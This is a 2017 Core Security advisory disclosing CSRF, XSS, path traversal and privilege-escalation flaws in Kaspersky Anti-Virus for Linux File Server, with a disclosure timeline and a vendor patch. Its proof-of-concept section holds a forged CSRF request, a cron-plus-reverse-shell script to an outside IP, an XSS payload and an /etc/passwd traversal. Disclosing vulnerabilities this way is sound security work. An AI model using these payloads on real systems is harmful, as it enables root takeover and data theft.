Kaspersky Anti-Virus File Server 8.0.3.297 XSS / CSRF / Code Execution

Kaspersky Anti-Virus for Linux File Server version 8.0.3.297 suffers from remote code execution, cross site request forgery, cross site scripting, security bypass, information disclosure, and path traversal vulnerabilities.


MD5 | 834309bd7c681fce682800c2b27a31c0

1. *Advisory Information*

Title: Kaspersky Anti-Virus File Server Multiple Vulnerabilities
Advisory ID: CORE-2017-0003
Advisory URL:
http://www.coresecurity.com/advisories/Kaspersky-Anti-Virus-File-Server-Multiple-Vulnerabilities
Date published: 2017-06-28
Date of last update: 2017-06-28
Vendors contacted: Kaspersky
Release mode: Forced release

2. *Vulnerability Information*

Class: Improper Neutralization of Input During Web Page Generation
('Cross-site Scripting') [CWE-79], Cross-Site Request Forgery [CWE-352],
Improper Privilege Management [CWE-269], Improper Limitation of a
Pathname to a Restricted Directory [CWE-22]
Impact: Code execution, Security bypass, Information leak
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2017-9813, CVE-2017-9810, CVE-2017-9811, CVE-2017-9812

3. *Vulnerability Description*

From Kaspersky Lab's website:
"Large corporate networks that use file servers running on different
platforms can be a real headache when it comes to antivirus protection.
Kaspersky Anti-Virus for Linux File Server is part of our range of new
and refreshed products, solutions and services for heterogeneous
networks. It provides a superior protection with Samba server
integration and other features that can protect workstations and file
servers in even the most complex heterogeneous networks. It is also
certified VMware Ready and supports current versions of FreeBSD for
integrated, future-proof protection."

Multiple vulnerabilities were found in the Kaspersky Anti-Virus for
Linux File Server [2] Web Management Console. It is possible for a
remote attacker to abuse these vulnerabilities and gain command
execution as root.

4. *Vulnerable Packages*

. Kaspersky Anti-Virus for Linux File Server 8.0.3.297 [2]
Other products and versions might be affected, but they were not tested.

5. *Vendor Information, Solutions and Workarounds*

Kaspersky [1] published the following Maintenance Pack:
. Maintenance Pack 2 Critical Fix 4 (version 8.0.4.312):
https://support.kaspersky.com/13738/

6. *Credits*

This vulnerability was discovered and researched by Leandro Barragan
and Maximiliano Vidal from Core Security Consulting Services. The
publication of this advisory was coordinated by Alberto Solino from
Core Advisories Team.

7. *Technical Description / Proof of Concept Code*

Kaspersky Anti-virus for Linux File Server comes bundled with a Web
Management Console to monitor the application's status and manage its
operation.

One specific feature allows configuring shell scripts to be executed
when certain events occur. This functionality is vulnerable to
cross-site request forgery, allowing code execution in the context of
the web application as the kluser account. The vulnerability is
described in section 7.1.

Moreover, it is possible to elevate privileges from kluser to root by
abusing the quarantine functionality provided by the kav4fs-control
system binary. This is described in section 7.2.

Additional web application vulnerabilities were found, including a
reflected cross-site scripting vulnerability (7.3) and a path traversal
vulnerability (7.4).

7.1. *Cross-site Request Forgery leading to Remote Command Execution*

[CVE-2017-9810]: There are no Anti-CSRF tokens in any forms on the web
interface. This would allow an attacker to submit authenticated requests
when an authenticated user browses an attacker-controlled domain.

The following request will update the notification settings to run a
shell command when an object is moved to quarantine. For the full list
of events refer to the product's documentation. Note that it is possible
to add a script to all existing events in a single request, widening the
window of exploitation.

The proof-of-concept creates the file /tmp/pepperoni. Shell commands
are run as the lower privilege kluser.

Payload:
/-----
"notifier": {"Actions": [{"Command": "touch /tmp/pepperoni",
"EventName": 22, "Enable": true, "__VersionInfo": "1 0"}]
-----/

Request:

/-----
POST /cgi-bin/cgictl?action=setTaskSettings HTTP/1.1
Host: <server IP>:9080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:52.0)
Gecko/20100101 Firefox/52.0
Accept: application/json, text/javascript, */*
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Referer: http://<server IP>:9080/
Content-Length: 3273
Cookie: wmc_useWZRDods=true; wmc_sid=690DE0005C5625A420255EFEBB3349F7;
wmc_full_stat=1;
wmc_logsSimpleMode=1;
wmc_backupSimpleMode=1; wmc_quaSimpleMode=1;
wmc_iconsole_lang=resource_en.js;
wmc_show_settings_descr=false;
iconsole_test; wmc_show_licence_descr=false
Connection: close

taskId=7&
settings=%7B%22ctime%22%3A%201490796963%2C%20%22notifier%22%3A%20%7B%22Actions%22%3A%20%5B%7B%22Command%22%3A%20%22touch%20%2Ftmp%2Fpepperoni%22%2C%20%22EventName%22%3A%2022%2C%20%22Enable%22%3A%20true%2C%20%22__VersionInfo%22%3A%20%221%200%22%7D%5D%2C%20%22CommonSmtpSettings%22%3A%20%7B%22DefaultRecipients%22%3A%20%5B%5D%2C%20%22InternalMailerSettings%22%3A%20%7B%22ConnectionTimeout%22%3A%2010%2C%20%22SmtpPort%22%3A%2025%2C%20%22SmtpQueueFolder%22%3A%20%22%2Fvar%2Fopt%2Fkaspersky%2Fkav4fs%2Fdb%2Fnotifier%22%2C%20%22SmtpServer%22%3A%20%22%22%2C%20%22__VersionInfo%22%3A%20%221%200%22%7D%2C%20%22Mailer%22%3A%20%221%22%2C%20%22Sender%22%3A%20%22%22%2C%20%22SendmailPath%22%3A%20%22%2Fusr%2Fsbin%2Fsendmail%20-t%20-i%22%2C%20%22__VersionInfo%22%3A%20%221%200%22%7D%2C%20%22EnableActions%22%3A%20true%2C%20%22EnableSmtp%22%3A%20false%2C%20%22SmtpNotifies%22%3A%20%5B%7B%22Body%22%3A%20%22%22%2C%20%22Enable%22%3A%20true%2C%20%22EventName%22%3A%201%2C%20%22Recipients%22%3A%20%5B%5D%2C%20%22Subject%22%3A%20%22Anti-Virus%20started%22%2C%20%22UseRecipientList%22%3A%202%2C%20%22__VersionInfo%22%3A%20%221%200%22%7D%2C%20%7B%22Body%22%3A%20%22%22%2C%20%22Enable%22%3A%20true%2C%20%22EventName%22%3A%206%2C%20%22Recipients%22%3A%20%5B%5D%2C%20%22Subject%22%3A%20%22License%20error%22%2C%20%22UseRecipientList%22%3A%202%2C%20%22__VersionInfo%22%3A%20%221%200%22%7D%2C%20%7B%22Body%22%3A%20%22%22%2C%20%22Enable%22%3A%20true%2C%20%22EventName%22%3A%207%2C%20%22Recipients%22%3A%20%5B%5D%2C%20%22Subject%22%3A%20%22Databases%20updated%22%2C%20%22UseRecipientList%22%3A%202%2C%20%22__VersionInfo%22%3A%20%221%200%22%7D%5D%2C%20%22__VersionInfo%22%3A%20%221%200%22%7D%2C%20%22snmp%22%3A%20%7B%22MasterAgentXAddress%22%3A%20%22tcp%3Alocalhost%3A705%22%2C%20%22PingInterval%22%3A%2015%2C%20%22TrapSuite%22%3A%20%7B%22AVBasesAppliedEventEnable%22%3A%20true%2C%20%22AVBasesAreOutOfDateEventEnable%22%3A%20true%2C%20%22AVBasesAreTotallyOutOfDateEventEnable%22%3A%20true%2C%20%22AVBasesAttachedEventEnable%22%3A%20true%2C%20%22AVBasesIntegrityCheckFailedEventEnable%22%3A%20true%2C%20%22AVBasesRollbackCompletedEventEnable%22%3A%20true%2C%20%22AVBasesRollbackErrorEventEnable%22%3A%20true%2C%20%22ApplicationSettingsChangedEventEnable%22%3A%20true%2C%20%22ApplicationStartedEventEnable%22%3A%20true%2C%20%22LicenseErrorEventEnable%22%3A%20true%2C%20%22LicenseExpiredEventEnable%22%3A%20true%2C%20%22LicenseExpiresSoonEventEnable%22%3A%20true%2C%20%22LicenseInstalledEventEnable%22%3A%20true%2C%20%22LicenseNotInstalledEventEnable%22%3A%20true%2C%20%22LicenseNotRevokedEventEnable%22%3A%20true%2C%20%22LicenseRevokedEventEnable%22%3A%20true%2C%20%22ModuleNotDownloadedEventEnable%22%3A%20true%2C%20%22NothingToUpdateEventEnable%22%3A%20true%2C%20%22ObjectDeletedEventEnable%22%3A%20true%2C%20%22ObjectDisinfectedEventEnable%22%3A%20true%2C%20%22ObjectSavedToBackupEventEnable%22%3A%20true%2C%20%22ObjectSavedToQuarantineEventEnable%22%3A%20true%2C%20%22RetranslationErrorEventEnable%22%3A%20true%2C%20%22TaskStateChangedEventEnable%22%3A%20true%2C%20%22ThreatDetectedEventEnable%22%3A%20true%2C%20%22UpdateErrorEventEnable%22%3A%20true%2C%20%22__VersionInfo%22%3A%20%221%200%22%7D%2C%20%22TrapsEnable%22%3A%20true%2C%20%22__VersionInfo%22%3A%20%221%200%22%7D%7D
&schedule=%7B%7D&skipCtimeCheck=true

-----/

7.2. *Privilege escalation due to excessive permissions*

[CVE-2017-9811]: The kluser is able to interact with the kav4fs-control
binary. By abusing the quarantine read and write operations, it is
possible to elevate the privileges to root.

The following proof-of-concept script adds a cron job that will be
executed as root.

/-----
# Make sure the application is running
/opt/kaspersky/kav4fs/bin/kav4fs-control --start-app

# Create cron job in /tmp
echo "* * * * * root /tmp/reverse.sh" > /tmp/badcron

# Sample reverse shell payload
cat > /tmp/reverse.sh << EOF
#!/bin/bash
bash -i >& /dev/tcp/172.16.76.1/8000 0>&1
EOF
chmod +x /tmp/reverse.sh

# Move the cron job to quarantine and grab the object ID
QUARANTINE_ID=$(/opt/kaspersky/kav4fs/bin/kav4fs-control -Q
--add-object /tmp/badcron | cut -d'=' -f2 | cut -d'.' -f1)

# Restore the file to /etc/cron.d
/opt/kaspersky/kav4fs/bin/kav4fs-control -Q --restore $QUARANTINE_ID
--file /etc/cron.d/implant
-----/

7.3. *Reflected cross-site scripting*

[CVE-2017-9813]: The scriptName parameter of the licenseKeyInfo action
method is vulnerable to cross-site scripting.

/-----
http://<server
IP>:9080/cgi-bin/cgictl?action=licenseKeyInfo&do_action=licenseKeyInfo&scriptName=</script><img+src%3dx+onerror%3d"alert(1)"%3b/>&active=&licenseKey=bla
-----/

7.4. *Path traversal*

[CVE-2017-9812]: The reportId parameter of the getReportStatus action
method can be abused to read arbitrary files with kluser privileges.
The following proof-of-concept reads the /etc/passwd file.

/-----
GET
/cgi-bin/cgictl?action=getReportStatus&reportId=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00
HTTP/1.1
Host: <server IP>:9080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:52.0)
Gecko/20100101 Firefox/52.0
Accept: application/json, text/javascript, */*
Accept-Language: en-US,en;q=0.5
Referer: http://<server IP>:9080/
Cookie: iconsole_test; wmc_useWZRDods=true;
wmc_sid=99E61AFCD3EC96F5E349AB439DAE46C4; wmc_full_stat=1;
wmc_logsSimpleMode=1; wmc_backupSimpleMode=0; wmc_quaSimpleMode=1;
wmc_iconsole_lang=resource_en.js
Connection: close
-----/

8. *Report Timeline*
. 2017-04-03: Core Security sent an initial notification to Kaspersky,
including a draft advisory.
. 2017-04-03: Kaspersky confirmed reception of advisory and informed
they will submit it to the relevant technical team for validation and
replication.
. 2017-04-06: Kaspersky confirmed they could reproduce three out of
five reported vulnerabilities and asked us opinion on their
justifications about mitigating factors on the other two. They also said
they would inform us about a fix date in a few days.
. 2017-04-06: Core Security thanked the confirmation and sent
justification for one of the vulnerabilities questioned. Core Security
agreed on removing one reported vulnerability since it can be mitigated
via a product setting.
. 2017-04-25: Kaspersky confirmed the rest of the vulnerabilities
reported and are working on a fix. They said fixes will be released
"till the June, 30", and also said will inform us the exact dates by
the end of June.
. 2017-04-25: Core Security thanked the confirmation of the final
vulnerabilities list and asked for clarification about the release date.
. 2017-04-25: Kaspersky clarified they will release the fix by June
30th and will let us know the exact date by mid June.
. 2017-06-19: Kaspersky mentioned they would like to go ahead with the
publication on June 30th and also asked for CVEs.
. 2017-06-19: Core Security answer back proposing advisory publication
to be July 3rd in order to avoid advisory publication on a Friday. Also
asked for clarification about a fix dated June 14th found by Core
Security researchers and whether or not it fixes the vulnerabilities
reported.
. 2017-06-21: Kaspersky answered back stating the fix dated June 14th
is related to fixes for reported vulnerabilities.
. 2017-06-21: Core Security asked if the June 14th patch (ID 13738) is
fixing *all* the vulnerabilities reported in the current advisory. If
so Core Security will be releasing the advisory sooner than planned.
Reminded Kaspersky said they would release the fixes by June 30th.
. 2017-06-22: Core Security sent a draft advisory with the final CVE
IDs for each vulnerability.
. 2017-06-23: Kaspersky said they will clarify about patch 13738 ASAP
and also noted about a typo in the advisory's timeline.
. 2017-06-23: Core Security requested again we need clarification
around patch 13738 as soon as possible.
. 2017-06-26: Core Security reviewed the patch released in June 14th
and confirmed it addresses all the vulnerabilities reported. Core
Security informed Kaspersky this advisory will be published as a
FORCED release on Wednesday 28th.
. 2017-06-28: Advisory CORE-2017-0003 published.

9. *References*

[1] https://www.kaspersky.com
[2] https://support.kaspersky.com/linux_file80

10. *About CoreLabs*

CoreLabs, the research center of Core Security, is charged with
anticipating the future needs and requirements for information security
technologies.
We conduct our research in several important areas of computer security
including system vulnerabilities, cyber attack planning and simulation,
source code auditing, and cryptography. Our results include problem
formalization, identification of vulnerabilities, novel solutions and
prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use
at: http://corelabs.coresecurity.com.

11. *About Core Security*

Courion and Core Security have rebranded the combined company, changing
its name to Core Security, to reflect the company's strong commitment to
providing enterprises with market-leading, threat-aware, identity,
access and vulnerability management solutions that enable actionable
intelligence and context needed to manage security risks across the
enterprise. Core Security's analytics-driven approach to security
enables customers to manage access and identify vulnerabilities, in
order to minimize risks and maintain continuous compliance. Solutions
include Multi-Factor Authentication, Provisioning, Identity Governance
and Administration (IGA), Identity and Access Intelligence (IAI), and
Vulnerability Management (VM). The combination of these solutions
provides context and shared intelligence through analytics, giving
customers a more comprehensive view of their security posture so they
can make more informed, prioritized, and better security remediation
decisions.

Core Security is headquartered in the USA with offices and operations in
South America, Europe, Middle East and Asia. To learn more, contact Core
Security at (678) 304-4500 or info@coresecurity.com.

12. *Disclaimer*

The contents of this advisory are copyright (c) 2017 Core Security
and (c) 2017 CoreLabs, and are licensed under a Creative Commons
Attribution Non-Commercial Share-Alike 3.0 (United States) License:
http://creativecommons.org/licenses/by-nc-sa/3.0/us/

13. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.




Related Posts

Comments